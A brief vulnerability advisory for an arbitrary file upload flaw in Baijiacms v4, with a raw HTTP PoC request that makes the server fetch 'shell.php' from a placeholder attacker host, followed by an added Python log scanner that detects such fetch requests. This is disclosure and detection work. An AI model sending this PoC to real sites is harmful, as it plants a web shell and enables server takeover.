
Arbitrary file upload exists in Baijiacms

Vendor: https://baijiacms.github.io/

Download link: https://github.com/baijiacms/baijiacmsV4.git

Vulnerability trigger parameter: &url

The process of vulnerability discovery is as follows:


PoC:

GET /CMS/baijiacms_v4_1_4_20170105/index.php?mod=site&act=public&do=file&op=fetch&url=http://ip:port/shell.php&status=1&beid=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://127.0.0.1/CMS/baijiacms_v4_1_4_20170105/index.php?mod=site&act=manager&do=dev&beid=1
Cookie: PHPSESSID=n3Ig3p80u2sdcgbrdI7paj8145
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

Files can be downloaded from a remote server and saved locally.
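A defender-side check for the request shape shown in the PoC, as an added example that is not part of the original advisory or of Baijiacms: it scans web-server access logs for calls to the `do=file&op=fetch` route and reports the remote `url` each one asked the server to fetch. The combined log format, the sample log lines, the script-extension list and the function names are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format), not taken from the page.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Jan/2024:10:00:01 +0000] "GET /index.php?mod=site&act=public&do=file&op=fetch&url=http://198.51.100.9:8000/shell.php&status=1&beid=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Jan/2024:10:00:05 +0000] "GET /index.php?mod=site&act=public&do=file&op=fetch&url=http%3A%2F%2Fcdn.example.org%2Flogo.png&beid=1 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.44 - - [05/Jan/2024:10:01:00 +0000] "GET /index.php?mod=site&act=manager&do=dev&beid=1 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Route parameters of the remote-fetch endpoint, as they appear in the PoC request.
FETCH_ROUTE = {"mod": "site", "act": "public", "do": "file", "op": "fetch"}
# Assumed list of extensions a PHP-enabled web server may execute.
SCRIPT_EXT = (".php", ".phtml", ".php5", ".phar", ".pht")


def classify(line):
    """Return a finding dict for a remote-fetch request, or None for other lines."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    # parse_qs percent-decodes each value once, so encoded url= values are covered.
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if any(params.get(k, [""])[-1].lower() != v for k, v in FETCH_ROUTE.items()):
        return None
    if "url" not in params:
        return None
    remote = params["url"][-1]
    path = unquote(urlsplit(remote).path).lower()
    # A fetched script file is the case the advisory describes; anything else
    # still means the server was told to pull remote content and needs review.
    severity = "high" if path.endswith(SCRIPT_EXT) else "review"
    return {"client": client, "remote": remote,
            "host": urlsplit(remote).hostname, "severity": severity}


def scan(log_text):
    """Classify every line of an access log and keep only the findings."""
    return [f for f in map(classify, log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Findings marked `high` are worth correlating with new files in the application's upload directory around the same timestamp.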